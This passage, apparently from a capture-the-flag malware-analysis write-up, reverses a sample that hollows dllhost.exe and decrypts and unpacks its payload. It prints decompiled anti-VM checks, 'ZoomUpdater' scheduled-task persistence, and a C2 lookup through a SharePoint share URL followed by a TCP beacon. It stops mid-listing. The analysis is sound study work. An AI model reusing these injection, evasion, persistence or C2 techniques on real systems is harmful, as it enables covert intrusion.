lpBaseAddress = VirtualAllocEx(hProcess, NewImageBase, SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// write the PE headers and the sections
WriteProcessMemory(hProcess, lpBaseAddress, lpBuffer, SizeOfHeaders, 0);
for (each section) {
    WriteProcessMemory(hProcess, NewBase + VirtualAddress, lpBuffer + PointerToRawData, SizeOfRawData, 0);
}
// patch the thread context
Context.Eax = NewBase + AddressOfEntryPoint;
WriteProcessMemory(hProcess, (LPVOID)(Context.Ebx + 8), &NewBase, 4, 0);
SetThreadContext(hThread, &Context);
// resume execution
ResumeThread(hThread);
```

Two details of the real code are worth noting. The value written into PEB->ImageBaseAddress is the payload's own OptionalHeader.ImageBase field (v5 + 52), not the address VirtualAllocEx returned, and there is no relocation pass at all; the injector therefore only works when VirtualAllocEx hands back the preferred base, which is also why it unmaps dllhost's image first. Second, the sections are written from SizeOfRawData bytes at PointerToRawData straight to VirtualAddress, so the decrypted zRC.dat must be a file-layout PE, which is what the MZ check in the next stage confirms.
Stage 3: analysis of the decrypted zRC.dat payload

1. Decryption and unpacking

1.1 Decryption script

```python
def decrypt_payload():
    with open("zRC.dat", "rb") as f:
        data = bytearray(f.read())

    # Key string. The IDA code indexes it with nNumberOfBytesToRead_1 % 9,
    # so the first 9 bytes are used: the 8 printable characters plus the trailing '\n'.
    key_str = "tf7*TV8u\n"
    key_len = 9

    print(f"[*] Decrypting, file size: {len(data)} bytes")
    print(f"[*] Key: {key_str[:key_len]}")

    for i in range(len(data)):
        data[i] ^= ord(key_str[i % key_len])

    # Save the decrypted file. It is injected into dllhost.exe, so it is most likely an EXE.
    output_filename = "zRC_decrypted.bin"
    with open(output_filename, "wb") as f:
        f.write(data)
    print(f"[+] Done, saved as: {output_filename}")

    # Quick header check
    if data[:2] == b"MZ":
        print("[+] Header: MZ (this is a PE file)")
    else:
        print(f"[-] Header: {data[:2]} (not a PE file, or shellcode)")

if __name__ == "__main__":
    decrypt_payload()
```

```
C:\ISCTF_dump>C:\Environment\Python38\python.exe c:/ISCTF_dump/1.py
[*] Decrypting, file size: 80384 bytes
[*] Key: tf7*TV8u

[+] Done, saved as: zRC_decrypted.bin
[+] Header: MZ (this is a PE file)
```

(The blank line after the key is the newline that is part of the key being printed.)

1.2 UPX unpacking

```
upx -d zRc_decrypted.bin
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2025
UPX 5.0.2       Markus Oberhumer, Laszlo Molnar & John Reiser   Jul 20th 2025

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
    173056 <-     80384   46.45%    win32/pe     zRc_decrypted.bin

Unpacked 1 file.
```
2. Anti-VM checks

Load the unpacked zRc_decrypted.bin in IDA:

```c
int start()
{
  sub_406FB2();
  return sub_4067E7();
}
```

```c
int __usercall sub_4067E7@<eax>(UINT uExitCode_1@<esi>)
{
  char v1; // bl
  _DWORD *v3; // eax
  _DWORD *v4; // esi
  _DWORD *v5; // eax
  _DWORD *v6; // esi
  int v7; // edi
  int v8; // esi
  _DWORD *v9; // eax
  char v10; // [esp+10h] [ebp-24h]
  UINT uExitCode; // [esp+14h] [ebp-20h]

  if ( !(unsigned __int8)sub_406509(1) || (v1 = 0, v10 = sub_4064D7(), n2 == 1) )
  {
    sub_406D55(7);
    goto LABEL_19;
  }
  if ( n2 )
  {
    v1 = 1;
  }
  else
  {
    n2 = 1;
    if ( sub_40DDE1(&unk_41C1E0, &unk_41C200) )
      return 255;
    sub_40DDB6(&unk_41C1BC, &unk_41C1DC);
    n2 = 2;
  }
  sub_406660(v10);
  v3 = (_DWORD *)sub_407062();
  v4 = v3;
  if ( *v3 && (unsigned __int8)sub_4065C9(v3) )
    ((void (__thiscall *)(_DWORD, _DWORD, int, _DWORD))*v4)(*v4, 0, 2, 0);
  v5 = (_DWORD *)sub_407068();
  v6 = v5;
  if ( *v5 && (unsigned __int8)sub_4065C9(v5) )
    sub_40D266(*v6);
  v7 = sub_40D854();
  v8 = *(_DWORD *)sub_40DE6B();
  v9 = (_DWORD *)sub_40DE65();
  uExitCode_1 = sub_402B60(*v9, v8, v7);          // main(argc, argv, envp)
  if ( !(unsigned __int8)sub_406E6F() )
  {
LABEL_19:
    sub_40D28C(uExitCode_1);
    sub_40D250(uExitCode);
    __debugbreak();
  }
  if ( !v1 )
    sub_40D241();
  sub_40667D(1, 0);
  return uExitCode_1;
}
```

sub_4067E7 is the CRT startup wrapper: one-time runtime initialisation guarded against re-entry by the global n2, registration of the exit/exception callbacks, and then a call into the real main logic sub_402B60 in the form main(argc, argv, envp).

```c
int sub_402B60()
{
  int v6; // eax
  ULONGLONG TickCount64; // kr00_8
  ULONGLONG v8; // rax
  bool v9; // cf
  ULONGLONG n0x1388; // rax
  SHELLEXECUTEINFOW SystemInfo; // [esp+24h] [ebp-6CCh] BYREF
  SHELLEXECUTEINFOW pExecInfo; // [esp+60h] [ebp-690h] BYREF
  HKEY phkResult; // [esp+9Ch] [ebp-654h] BYREF
  _MEMORYSTATUSEX Buffer; // [esp+A0h] [ebp-650h] BYREF
  DWORD cbData[3]; // [esp+E8h] [ebp-608h] BYREF
  char v18; // [esp+F4h] [ebp-5FCh]
  WCHAR Data[260]; // [esp+F8h] [ebp-5F8h] BYREF
  _OWORD v20[4]; // [esp+300h] [ebp-3F0h] BYREF
  __int16 v21; // [esp+340h] [ebp-3B0h]
  _BYTE v22[938]; // [esp+342h] [ebp-3AEh] BYREF

  _EAX = 0;
  __asm { cpuid }
  cbData[0] = _EBX;                      // 12-byte vendor string in EBX:EDX:ECX
  cbData[1] = _EDX;
  cbData[2] = _ECX;
  v18 = 0;                               // NUL terminator
  if ( sub_407730(cbData, "VMware")
    || sub_407730(cbData, "VBox")
    || sub_407730(cbData, "KVM")
    || sub_407730(cbData, "Microsoft Hv")
    || sub_407730(cbData, "Xen") )
  {
    return 0;
  }
  cbData[0] = 256;
  if ( !RegOpenKeyExA(HKEY_LOCAL_MACHINE, "HARDWARE\\DESCRIPTION\\System\\BIOS", 0, 0x20019u, &phkResult) )
  {
    if ( !RegQueryValueExA(phkResult, "SystemProductName", 0, 0, (LPBYTE)Data, cbData)
      && (sub_407730(Data, "Virtual")
       || sub_407730(Data, "VMware")
       || sub_407730(Data, "VBox")
       || sub_407730(Data, "Hyper-V")
       || sub_407730(Data, "Cloud")) )
    {
      v6 = 0;
      goto LABEL_19;
    }
    RegCloseKey(phkResult);
  }
  v6 = 1;
LABEL_19:
  if ( v6 )
  {
    Buffer.dwLength = 64;
    GlobalMemoryStatusEx(&Buffer);
    if ( (Buffer.ullTotalPhys >> 30) >= 2 )                      // at least 2 GB of RAM
    {
      GetSystemInfo((LPSYSTEM_INFO)&SystemInfo);
      if ( SystemInfo.lpParameters >= (LPCWSTR)4 )               // dwNumberOfProcessors >= 4
      {
        TickCount64 = GetTickCount64();
        cbData[0] = HIDWORD(TickCount64);
        Sleep(0x1388u);                                          // 5000 ms
        v8 = GetTickCount64();
        v9 = v8 < __PAIR64__(cbData[0], TickCount64);
        n0x1388 = v8 - __PAIR64__(cbData[0], TickCount64);
        if ( HIDWORD(n0x1388) > 0 || !v9 && (unsigned int)n0x1388 >= 0x1388 )   // sleep was not skipped
        {
          SystemInfo.cbSize = 60;
          SystemInfo.fMask = 64;                                 // SEE_MASK_NOCLOSEPROCESS
          SystemInfo.hwnd = 0;
          SystemInfo.lpVerb = L"open";
          SystemInfo.lpFile = L"schtasks";
          SystemInfo.lpParameters = L"/query /tn ZoomUpdater";
          memset(&SystemInfo.lpDirectory, 0, 36);
          phkResult = 0;
          if ( ShellExecuteExW(&SystemInfo) && SystemInfo.hProcess )
          {
            WaitForSingleObject(SystemInfo.hProcess, 0xFFFFFFFF);
            GetExitCodeProcess(SystemInfo.hProcess, (LPDWORD)&phkResult);
            CloseHandle(SystemInfo.hProcess);
          }
          if ( phkResult )                                       // non-zero exit: task does not exist yet
          {
            SHGetFolderPathW(0, 42, 0, 0, Data);                 // CSIDL_PROGRAM_FILESX86
            sub_40AEF0(Data, 260, L"\\ZoomRemoteControl\\bin\\ZoomRemoteControl.exe");
            v21 = 0;
            v20[0] = xmmword_4258D8;
            v20[1] = xmmword_4258E8;
            v20[2] = xmmword_4258F8;
            v20[3] = xmmword_425908;
            sub_407F20(v22, 0, 934);
            LODWORD(Buffer.ullAvailExtendedVirtual) = 77;
            *(_OWORD *)&Buffer.dwLength = xmmword_42591C;
            *(_OWORD *)&Buffer.ullAvailPhys = xmmword_42592C;
            *(_OWORD *)&Buffer.ullAvailPageFile = xmmword_42593C;
            Buffer.ullAvailVirtual = 0x45005400530059LL;         // UTF-16 "YSTE"
            sub_40AEF0(v20, 500, Data);
            sub_40AEF0(v20, 500, &Buffer);
            pExecInfo.cbSize = 60;
            pExecInfo.lpParameters = (LPCWSTR)v20;
            pExecInfo.fMask = 64;
            pExecInfo.hwnd = 0;
            pExecInfo.lpVerb = L"open";
            pExecInfo.lpFile = L"schtasks";
            memset(&pExecInfo.lpDirectory, 0, 36);
            ShellExecuteExW(&pExecInfo);                         // schtasks /create ... ZoomUpdater
          }
          sub_402450();
        }
      }
    }
  }
  return 0;
}
```

The sample contains several anti-VM / anti-sandbox checks:

CPUID check: compares the vendor string against VMware, VirtualBox, KVM, Hyper-V ("Microsoft Hv") and Xen
BIOS check: reads HKLM\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName and looks for virtualisation keywords (Virtual, VMware, VBox, Hyper-V, Cloud)
Memory check: requires at least 2 GB of physical memory
CPU count check: requires at least 4 logical processors
Timing check: compares GetTickCount64 before and after Sleep(5000) to detect sandboxes that fast-forward sleeps

One caveat on the first check: as decompiled, CPUID is executed with EAX = 0, which returns the processor vendor ("GenuineIntel", "AuthenticAMD") in EBX:EDX:ECX; the hypervisor vendor strings the code compares against live in leaf 0x40000000. If the `_EAX = 0` is accurate, this check never matches on a real hypervisor and the registry check is the one that actually decides. Any failed check returns 0 silently, so the sample simply does nothing in an analysis VM.

Also note that the schtasks command line is assembled at runtime from xmmword constants rather than stored as one string (the 0x45005400530059 fragment is UTF-16 "YSTE", which suggests a "/ru SYSTEM" argument), so a plain strings pass will not show it.

In short, sub_402B60 first performs anti-VM checks via CPUID and the BIOS registry keywords, then applies memory, CPU and sleep-skew sandbox thresholds, checks with schtasks /query whether persistence already exists and, if not, creates a scheduled task named ZoomUpdater pointing at ZoomRemoteControl.exe, and finally enters sub_402450 to fetch the C2 configuration and talk to the C2.

3. Network communication analysis

```c
int __usercall sub_402450@<eax>(int a1@<ebp>)
{
  void *hRequest; // edi
  BOOL v2; // eax
  char *lpBuffer; // esi
  unsigned int v4; // edi
  __int128 *v5; // esi
  char *v6; // esi
  int v7; // eax
  unsigned int i; // ecx
  _DWORD *v9; // eax
  _BYTE *v10; // edx
  unsigned int v11; // ecx
  _BYTE *v12; // edx
  void *v13; // edx
  unsigned int n0xF_5; // ecx
  void *v15; // edx
  int v16; // esi
  _DWORD *hSession_1; // esi
  _DWORD *v18; // edi
  int s; // esi
  const CHAR *pszAddrString; // eax
  void *v21; // edx
  unsigned int v22; // ecx
  _BYTE *v23; // edx
  void *v24; // edx
  const char *buf; // eax
  void *buf_2; // edx
  _BYTE *v28; // [esp+0h] [ebp-2ACh]
  unsigned int n0xF_2; // [esp+14h] [ebp-298h]
  _BYTE *v30; // [esp+18h] [ebp-294h]
  unsigned int n0xF_1; // [esp+2Ch] [ebp-280h]
  __int128 v32; // [esp+30h] [ebp-27Ch] BYREF
  int v33; // [esp+40h] [ebp-26Ch]
  unsigned int n0xF_4; // [esp+44h] [ebp-268h]
  __int128 v35; // [esp+48h] [ebp-264h] BYREF
  int v36; // [esp+58h] [ebp-254h]
  unsigned int n0xF_3; // [esp+5Ch] [ebp-250h]
  int v38; // [esp+60h] [ebp-24Ch]
  void *hRequest_1; // [esp+64h] [ebp-248h]
  char *lpBuffer_1; // [esp+68h] [ebp-244h]
  HINTERNET hConnect; // [esp+6Ch] [ebp-240h]
  _DWORD *hSession; // [esp+70h] [ebp-23Ch] BYREF
  DWORD lpdwNumberOfBytesAvailable_; // [esp+74h] [ebp-238h] BYREF
  struct WSAData lpWSAData_; // [esp+78h] [ebp-234h] BYREF
  struct sockaddr name_; // [esp+20Ch] [ebp-A0h] BYREF
  _DWORD v46[5]; // [esp+21Ch] [ebp-90h] BYREF
  unsigned int n0xF_6; // [esp+230h] [ebp-7Ch]
  _DWORD *v48; // [esp+234h] [ebp-78h] BYREF
  unsigned int v49; // [esp+244h] [ebp-68h]
  unsigned int n0xF; // [esp+248h] [ebp-64h]
  DWORD lpdwNumberOfBytesRead_; // [esp+24Ch] [ebp-60h] BYREF
  __int128 v52; // [esp+250h] [ebp-5Ch] BYREF
  int v53; // [esp+260h] [ebp-4Ch]
  unsigned int n15; // [esp+264h] [ebp-48h]
  __int128 buf_1; // [esp+268h] [ebp-44h] BYREF
  int len; // [esp+278h] [ebp-34h]
  unsigned int n0xF_7; // [esp+27Ch] [ebp-30h]
  __int64 v58; // [esp+280h] [ebp-2Ch] BYREF
  int v59; // [esp+288h] [ebp-24h]
  int *v60; // [esp+290h] [ebp-1Ch]
  struct _EXCEPTION_REGISTRATION_RECORD *ExceptionList; // [esp+294h] [ebp-18h]
  void *v62; // [esp+298h] [ebp-14h]
  int v63; // [esp+29Ch] [ebp-10h]
  int v64; // [esp+2A0h] [ebp-Ch]
  void *v65; // [esp+2A4h] [ebp-8h]
  int v66; // [esp+2A8h] [ebp-4h] BYREF
  void *retaddr; // [esp+2ACh] [ebp+0h]

  v64 = a1;
  v65 = retaddr;
  v63 = -1;
  v62 = &loc_41B9C4;
  ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
  v60 = &v66;
  hSession = WinHttpOpen(
               L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 Edg/142.0.0.0",
               0, 0, 0, 0);
  hConnect = WinHttpConnect(hSession, L"colonised-my.sharepoint.com", 0x1BBu, 0);      // port 443
  hRequest = WinHttpOpenRequest(
               hConnect,
               L"GET",
               L"/personal/f00001111_colonised_onmicrosoft_com/_layouts/52/download.aspx?share=EQsrTSD_4ehGvYTXbmU5zR0B0lk4L-x0r8yGztFlye2j9Q",
               0, 0, 0, 0x800000u);                                                   // WINHTTP_FLAG_SECURE
  hRequest_1 = hRequest;
  v2 = WinHttpSendRequest(hRequest, 0, 0, 0, 0, 0, 0);
  if ( v2 )
    v2 = WinHttpReceiveResponse(hRequest, 0);
  v53 = 0;
  v52 = 0;
  n15 = 15;
  LOBYTE(v52) = 0;
  v63 = 0;
  if ( v2 )
  {
    lpdwNumberOfBytesAvailable_ = 0;
    do                                                       // read the whole body into a std::string
    {
      WinHttpQueryDataAvailable(hRequest, &lpdwNumberOfBytesAvailable_);
      if ( !lpdwNumberOfBytesAvailable_ )
        break;
      lpBuffer = (char *)sub_4066F6(lpdwNumberOfBytesAvailable_ + 1);
      lpBuffer_1 = lpBuffer;
      sub_407F20(lpBuffer, 0, lpdwNumberOfBytesAvailable_ + 1);
      lpdwNumberOfBytesRead_ = 0;
      if ( WinHttpReadData(hRequest, lpBuffer, lpdwNumberOfBytesAvailable_, &lpdwNumberOfBytesRead_) )
      {
        v4 = strlen(lpBuffer);
        if ( v4 > n15 - v53 )
        {
          LOBYTE(v38) = 0;
          sub_404BF0(v4, v38, lpBuffer, v4);
        }
        else
        {
          v5 = &v52;
          if ( n15 > 0xF )
            v5 = (__int128 *)v52;
          v6 = (char *)v5 + v53;
          v53 += v4;
          sub_4079A0(v6, lpBuffer_1, v4);
          v6[v4] = 0;
          lpBuffer = lpBuffer_1;
        }
        hRequest = hRequest_1;
      }
      sub_406260(lpBuffer);
    }
    while ( lpdwNumberOfBytesAvailable_ );
  }
  WinHttpCloseHandle(hRequest);
  WinHttpCloseHandle(hConnect);
  WinHttpCloseHandle(hSession);
  v33 = 0;
  n0xF_4 = 0;
  v32 = 0;
  sub_4046D0("lD1bZ0", 6);                                   // end marker
  LOBYTE(v63) = 1;
  v36 = 0;
  v35 = 0;
  n0xF_3 = 0;
  sub_4046D0("E9dE7d", 6);                                   // start marker
  LOBYTE(v63) = 2;
  sub_402080(&v35, &v32);                                    // extract the text between the markers
  LOBYTE(v63) = 3;
  v7 = sub_401D80();                                         // custom-alphabet Base64 decode
  LOBYTE(v63) = 4;
  sub_403280(v7);
  for ( i = 0; i < v49; ++i )                                // XOR every byte with 1
  {
    v9 = &v48;
    if ( n0xF > 0xF )
      v9 = v48;
    *((_BYTE *)v9 + i) ^= 1u;
  }
  LOBYTE(v63) = 6;
  if ( n0xF_1 > 0xF )
  {
    v10 = v30;
    if ( n0xF_1 + 1 >= 0x1000 )
    {
      v10 = (_BYTE *)*((_DWORD *)v30 - 1);
      v11 = n0xF_1 + 36;
      if ( (unsigned int)(v30 - v10 - 4) > 0x1F )
        goto LABEL_71;
    }
    sub_4066E8(v10);
  }
  LOBYTE(v63) = 7;
  if ( n0xF_2 > 0xF )
  {
    v12 = v28;
    if ( n0xF_2 + 1 >= 0x1000 )
    {
      v12 = (_BYTE *)*((_DWORD *)v28 - 1);
      v11 = n0xF_2 + 36;
      if ( (unsigned int)(v28 - v12 - 4) > 0x1F )
        goto LABEL_71;
    }
    sub_4066E8(v12);
  }
  LOBYTE(v63) = 8;
  if ( n0xF_3 > 0xF )
  {
    v13 = (void *)v35;
    if ( n0xF_3 + 1 >= 0x1000 )
    {
      v13 = *(void **)(v35 - 4);
      v11 = n0xF_3 + 36;
      if ( (unsigned int)(v35 - (_DWORD)v13 - 4) > 0x1F )
        goto LABEL_71;
    }
    sub_4066E8(v13);
  }
  v36 = 0;
  n0xF_3 = 15;
  LOBYTE(v35) = 0;
  LOBYTE(v63) = 9;
  n0xF_5 = n0xF_4;
  if ( n0xF_4 <= 0xF )
    goto LABEL_34;
  v15 = (void *)v32;
  if ( n0xF_4 + 1 >= 0x1000 )
  {
    v15 = *(void **)(v32 - 4);
    v11 = n0xF_4 + 36;
    if ( (unsigned int)(v32 - (_DWORD)v15 - 4) > 0x1F )
    {
LABEL_71:
      sub_40AEAF(v11, 0, 0, 0, 0, 0);
      goto LABEL_72;
    }
  }
  sub_4066E8(v15);
LABEL_34:
  v33 = 0;
  n0xF_4 = 15;
  LOBYTE(v32) = 0;
  v58 = 0;
  v59 = 0;
  sub_4021D0(n0xF_5);                                        // split on '|' into a vector<string>
  LOBYTE(v63) = 10;
  if ( (unsigned int)(HIDWORD(v58) - v58 - 48) > 0x18 )      // need exactly the ip and port fields
  {
    v16 = 1;
    goto LABEL_54;
  }
  sub_403280(v58);                                           // ip string
  LOBYTE(v63) = 11;
  hSession_1 = (_DWORD *)(v58 + 24);                         // port string
  v18 = (_DWORD *)sub_40B29E();                              // errno
  if ( hSession_1[5] > 0xFu )
    hSession_1 = (_DWORD *)*hSession_1;
  *v18 = 0;
  hConnect = (HINTERNET)sub_40BC9D(hSession_1, &hSession, 10);   // strtol
  if ( hSession_1 == hSession )
LABEL_72:
    sub_40581D("invalid stoi argument");
  if ( *v18 == 34 )
    sub_40585D("stoi argument out of range");
  if ( WSAStartup(0x202u, &lpWSAData_) == 0 )
  {
    s = socket(2, 1, 0);                                     // AF_INET, SOCK_STREAM
    if ( s >= 0 )
    {
      name_ = 0;
      name_.sa_family = 2;
      *(_WORD *)name_.sa_data = htons((u_short)hConnect);    // port
      pszAddrString = (const CHAR *)v46;
      if ( n0xF_6 > 0xF )
        pszAddrString = (const CHAR *)v46[0];
      if ( inet_pton(2, pszAddrString, &name_.sa_data[2]) > 0 )
      {
        if ( connect(s, &name_, 16) >= 0 )
        {
          len = 0;
          n0xF_7 = 0;
          buf_1 = 0;
          sub_4046D0("get_cmd", 7);
          buf = (const char *)&buf_1;
          if ( n0xF_7 > 0xF )
            buf = (const char *)buf_1;
          send(s, buf, len, 0);
          closesocket(s);
          WSACleanup();
          v16 = 0;
          if ( n0xF_7 > 0xF )
          {
            buf_2 = (void *)buf_1;
            if ( n0xF_7 + 1 >= 0x1000 )
            {
              buf_2 = *(void **)(buf_1 - 4);
              v22 = n0xF_7 + 36;
              if ( (unsigned int)(buf_1 - (_DWORD)buf_2 - 4) > 0x1F )
                goto LABEL_74;
            }
            sub_4066E8(buf_2);
          }
          len = 0;
          n0xF_7 = 15;
          LOBYTE(buf_1) = 0;
          goto LABEL_49;
        }
        closesocket(s);
      }
      WSACleanup();
    }
  }
  v16 = 1;
LABEL_49:
  if ( n0xF_6 > 0xF )
  {
    v21 = (void *)v46[0];
    if ( n0xF_6 + 1 >= 0x1000 )
    {
      v21 = *(void **)(v46[0] - 4);
      v22 = n0xF_6 + 36;
      if ( (unsigned int)(v46[0] - (_DWORD)v21 - 4) > 0x1F )
        goto LABEL_74;
    }
    sub_4066E8(v21);
  }
  v46[4] = 0;
  n0xF_6 = 15;
  LOBYTE(v46[0]) = 0;
LABEL_54:
  sub_403180(&v58);
  if ( n0xF > 0xF )
  {
    v23 = v48;
    if ( n0xF + 1 >= 0x1000 )
    {
      v23 = (_BYTE *)*(v48 - 1);
      v22 = n0xF + 36;
      if ( (unsigned int)((char *)v48 - v23 - 4) > 0x1F )
        goto LABEL_74;
    }
    sub_4066E8(v23);
  }
  v49 = 0;
  n0xF = 15;
  LOBYTE(v48) = 0;
  if ( n15 > 0xF )
  {
    v24 = (void *)v52;
    if ( n15 + 1 < 0x1000
      || (v24 = *(void **)(v52 - 4), v22 = n15 + 36, (unsigned int)(v52 - (_DWORD)v24 - 4) <= 0x1F) )
    {
      sub_4066E8(v24);
      return v16;
    }
LABEL_74:
    sub_40AEAF(v22, 0, 0, 0, 0, 0);
    JUMPOUT(0x402B4C);
  }
  return v16;
}
```

Most of the listing is MSVC std::string / std::vector bookkeeping (the n0xF > 0xF tests are the small-string-optimisation checks, the sub_4066E8 calls are the deallocations). The actual logic: sub_402450 spoofs a browser User-Agent and uses WinHTTP to fetch a SharePoint shared-download link on colonised-my.sharepoint.com, obtaining a text blob that contains the configuration. It then uses lD1bZ0 and E9dE7d as delimiters to extract the field between them, decodes it with a custom-alphabet Base64 routine and XORs every byte with 1, recovering the plaintext C2 IP and port (the port is converted with stoi). Finally it initialises Winsock, opens a TCP connection and sends the fixed string get_cmd to request a command from the C2. Note that the sample closes the socket immediately after send() without reading a reply; the final "command" is obtained by simply visiting the address.

3.1 First callback

```c
hSession = WinHttpOpen(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) ... Edg/142.0.0.0", ...);
hConnect = WinHttpConnect(hSession, L"colonised-my.sharepoint.com", 443, 0);
hRequest = WinHttpOpenRequest(hConnect, L"GET", L"/personal/f00001111_colonised_onmicrosoft_com/_layouts/52/download.aspx?share=...", ...);
```
Domain: colonised-my.sharepoint.com. User-Agent: spoofed as an Edge browser.

3.2 Fetching the C2 configuration

The data downloaded from the server contains the encrypted C2 address. Fetch the link by hand first: https://colonised-my.sharepoint.com/personal/f00001111_colonised_onmicrosoft_com/_layouts/52/download.aspx?share=EQsrTSD_4ehGvYTXbmU5zR0B0lk4L-x0r8yGztFlye2j9Q serves a file c2.dat containing:

```
oA0tG3aW2vT8mL5tvM1qV3cF2aB2xS6ztT7gX0zB1xR9zK8mjP0xP2iT3lO6fH1rpE4gP6pA2mE9dE7dntyVmZqZlZm5lZy5Fti2mZe1lD1bZ0nJ8gY7lR2qmP3vK5nY1hD3cT7guJ8tQ8rE6qJ1gF6ipZ0rF0vR5yB4xA4nyD7wM0lV5wC4rZ1c
```

In the middle of it: E9dE7d | ntyVmZqZlZm5lZy5Fti2mZe1 | lD1bZ0. After the GET, the code checks whether the response contains both lD1bZ0 and E9dE7d; the part that needs decoding is what sits between E9dE7d and lD1bZ0, i.e. ntyVmZqZlZm5lZy5Fti2mZe1. Everything outside the markers is filler.

3.3 Custom Base64 plus XOR decoding

The decoder sub_401D80:

```c
_DWORD *__fastcall sub_401D80(_DWORD *a1, _DWORD *a2)
{
  _DWORD *v2; // edi
  int v3; // eax
  unsigned int n0xF; // ecx
  _DWORD *v5; // eax
  int n4_1; // esi
  _DWORD *v7; // eax
  _DWORD *v8; // eax
  int n4; // edi
  int *v10; // ecx
  char v11; // al
  char *v12; // esi
  char *v13; // eax
  int n3; // esi
  unsigned int n0xF_2; // ecx
  unsigned int n0xF_1; // edx
  _DWORD *v17; // eax
  char *v18; // eax
  int n4_2; // eax
  bool v20; // cf
  int n4_3; // edi
  int *v22; // ecx
  char v23; // al
  char *v24; // esi
  char *v25; // eax
  int v26; // esi
  unsigned int n0xF_4; // ecx
  unsigned int n0xF_3; // edx
  _DWORD *v29; // eax
  char *v30; // eax
  int v32; // [esp+10h] [ebp-3Ch]
  _DWORD *v33; // [esp+18h] [ebp-34h]
  char v34; // [esp+1Ch] [ebp-30h]
  int v35; // [esp+20h] [ebp-2Ch]
  int v36; // [esp+24h] [ebp-28h]
  char v37; // [esp+24h] [ebp-28h]
  char v39; // [esp+28h] [ebp-24h]
  int v40; // [esp+2Ch] [ebp-20h]
  int n4_4; // [esp+30h] [ebp-1Ch]
  char v42; // [esp+30h] [ebp-1Ch]
  unsigned __int8 n43; // [esp+37h] [ebp-15h]
  char v44; // [esp+38h] [ebp-14h]
  char i; // [esp+39h] [ebp-13h]
  char v46; // [esp+3Ah] [ebp-12h]
  char v47; // [esp+3Ch] [ebp-10h]
  unsigned __int8 v48; // [esp+3Dh] [ebp-Fh]
  unsigned __int8 v49; // [esp+3Eh] [ebp-Eh]
  char v50; // [esp+3Fh] [ebp-Dh]
  int v51; // [esp+48h] [ebp-4h]

  v33 = a2;
  v2 = a1;
  v3 = a2[4];
  *(_OWORD *)a1 = 0;
  a1[4] = 0;
  a1[5] = 15;
  n4_4 = 0;
  v35 = 0;
  *(_BYTE *)a1 = 0;
  v51 = 0;
  if ( v3 )
  {
    do
    {
      n0xF = a2[5];
      v40 = v3 - 1;
      v5 = a2;
      if ( n0xF > 0xF )
        v5 = (_DWORD *)*a2;
      n4_1 = n4_4;
      if ( *((_BYTE *)v5 + v35) == 61 )                       // '=' padding ends the input
        break;
      v7 = a2;
      if ( n0xF > 0xF )
        v7 = (_DWORD *)*a2;
      n43 = *((_BYTE *)v7 + v35);
      if ( !sub_40AFC0(n43) && n43 != 43 && n43 != 47 )       // isalnum, '+', '/'
        break;
      a2 = v33;
      v8 = v33;
      if ( v33[5] > 0xFu )
        v8 = (_DWORD *)*v33;
      *(&v47 + n4_4) = *((_BYTE *)v8 + v35);                  // collect 4 input characters
      n4_1 = n4_4 + 1;
      n4_4 = n4_1;
      ++v35;
      if ( n4_1 == 4 )
      {
        for ( n4 = 0; n4 < 4; ++n4 )
        {
          v10 = &dword_42ABC4;                                // the alphabet std::string
          if ( (unsigned int)::n0xF > 0xF )
            v10 = (int *)dword_42ABC4;
          v42 = (char)v10;
          if ( dword_42ABD4 )
          {
            v12 = (char *)v10 + dword_42ABD4;
            LOBYTE(v32) = *(&v47 + n4);
            v13 = (char *)sub_405610(v10, (char *)v10 + dword_42ABD4, v32);   // std::find in the alphabet
            if ( v13 == v12 )
              v11 = -1;
            else
              v11 = (_BYTE)v13 - v42;                         // index of the character in the alphabet
          }
          else
          {
            v11 = -1;
          }
          *(&v47 + n4) = v11;
        }
        v2 = a1;
        v44 = 4 * v47 + ((v48 >> 4) & 3);                     // standard 4-to-3 repacking
        v46 = v50 + (v49 << 6);
        n3 = 0;
        i = 16 * v48 + ((v49 >> 2) & 0xF);
        do
        {
          n0xF_2 = a1[4];
          n0xF_1 = a1[5];
          v34 = *(&v44 + n3);
          if ( n0xF_2 >= n0xF_1 )
          {
            LOBYTE(v36) = 0;
            sub_404AA0(1, v36, v34);                          // push_back with reallocation
          }
          else
          {
            a1[4] = n0xF_2 + 1;
            v17 = a1;
            if ( n0xF_1 > 0xF )
              v17 = (_DWORD *)*a1;
            v18 = (char *)v17 + n0xF_2;
            v18[1] = 0;
            *v18 = v34;
          }
          ++n3;
        }
        while ( n3 < 3 );
        a2 = v33;
        n4_1 = 0;
        n4_4 = 0;
      }
      v3 = v40;
    }
    while ( v40 );
    if ( n4_1 )                                               // unpadded tail group
    {
      n4_2 = n4_1;
      if ( n4_1 < 4 )
      {
        v20 = (unsigned int)n4_1 < 4;
        do
        {
          if ( !v20 )
          {
            sub_406388();
            JUMPOUT(0x402074);
          }
          *(&v47 + n4_2++) = 0;
          v20 = (unsigned int)n4_2 < 4;
        }
        while ( n4_2 < 4 );
      }
      for ( n4_3 = 0; n4_3 < 4; ++n4_3 )
      {
        v22 = &dword_42ABC4;
        if ( (unsigned int)::n0xF > 0xF )
          v22 = (int *)dword_42ABC4;
        v37 = (char)v22;
        if ( dword_42ABD4 )
        {
          v24 = (char *)v22 + dword_42ABD4;
          LOBYTE(v40) = *(&v47 + n4_3);
          v25 = (char *)sub_405610(v22, (char *)v22 + dword_42ABD4, v40);
          if ( v25 == v24 )
            v23 = -1;
          else
            v23 = (_BYTE)v25 - v37;
        }
        else
        {
          v23 = -1;
        }
        *(&v47 + n4_3) = v23;
      }
      v26 = 0;
      v2 = a1;
      v44 = 4 * v47 + ((v48 >> 4) & 3);
      v46 = v50 + (v49 << 6);
      for ( i = 16 * v48 + ((v49 >> 2) & 0xF); v26 < n4_4 - 1; ++v26 )
      {
        n0xF_4 = v2[4];
        n0xF_3 = v2[5];
        v39 = *(&v44 + v26);
        if ( n0xF_4 >= n0xF_3 )
        {
          LOBYTE(v40) = 0;
          sub_404AA0(1, v40, v39);
        }
        else
        {
          v2[4] = n0xF_4 + 1;
          v29 = v2;
          if ( n0xF_3 > 0xF )
            v29 = (_DWORD *)*v2;
          v30 = (char *)v29 + n0xF_4;
          v30[1] = 0;
